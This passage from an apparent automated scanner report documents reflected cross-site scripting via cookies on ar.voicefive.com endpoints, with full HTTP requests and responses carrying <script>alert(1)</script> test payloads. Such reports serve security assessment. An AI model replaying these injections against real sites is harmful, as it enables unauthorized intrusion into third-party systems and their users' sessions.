BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&49e92<script>alert(1)</script>e9b3d058372', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...

3.56. http://ar.voicefive.com/b/node_rcAll.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 96c60<script>alert(1)</script>4bda17080c7 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&96c60<script>alert(1)</script>4bda17080c7; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&96c60<script>alert(1)</script>4bda17080c7' });

3.57. http://ar.voicefive.com/b/node_rcAll.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 69309<script>alert(1)</script>3ac55d912d3 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&69309<script>alert(1)</script>3ac55d912d3; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&69309<script>alert(1)</script>3ac55d912d3', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mo
...[SNIP]...

3.58. http://ar.voicefive.com/b/node_rcAll.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 9bae7<script>alert(1)</script>d8f791fc7fb was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&9bae7<script>alert(1)</script>d8f791fc7fb; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
2:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&9bae7<script>alert(1)</script>d8f791fc7fb', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

3.59. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91143664 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 20f87<script>alert(1)</script>2527a3b6a73 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&20f87<script>alert(1)</script>2527a3b6a73; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:44 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:44 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&20f87<script>alert(1)</script>2527a3b6a73', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' });

3.60. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 5e81e<script>alert(1)</script>764a5040dac was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&5e81e<script>alert(1)</script>764a5040dac; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&5e81e<script>alert(1)</script>764a5040dac', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=
...[SNIP]...

3.61. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97464717 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 35678<script>alert(1)</script>3fd8551a319 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&35678<script>alert(1)</script>3fd8551a319; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&35678<script>alert(1)</script>3fd8551a319', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...

3.62. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 4fcdf<script>alert(1)</script>8ee39c256d0 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 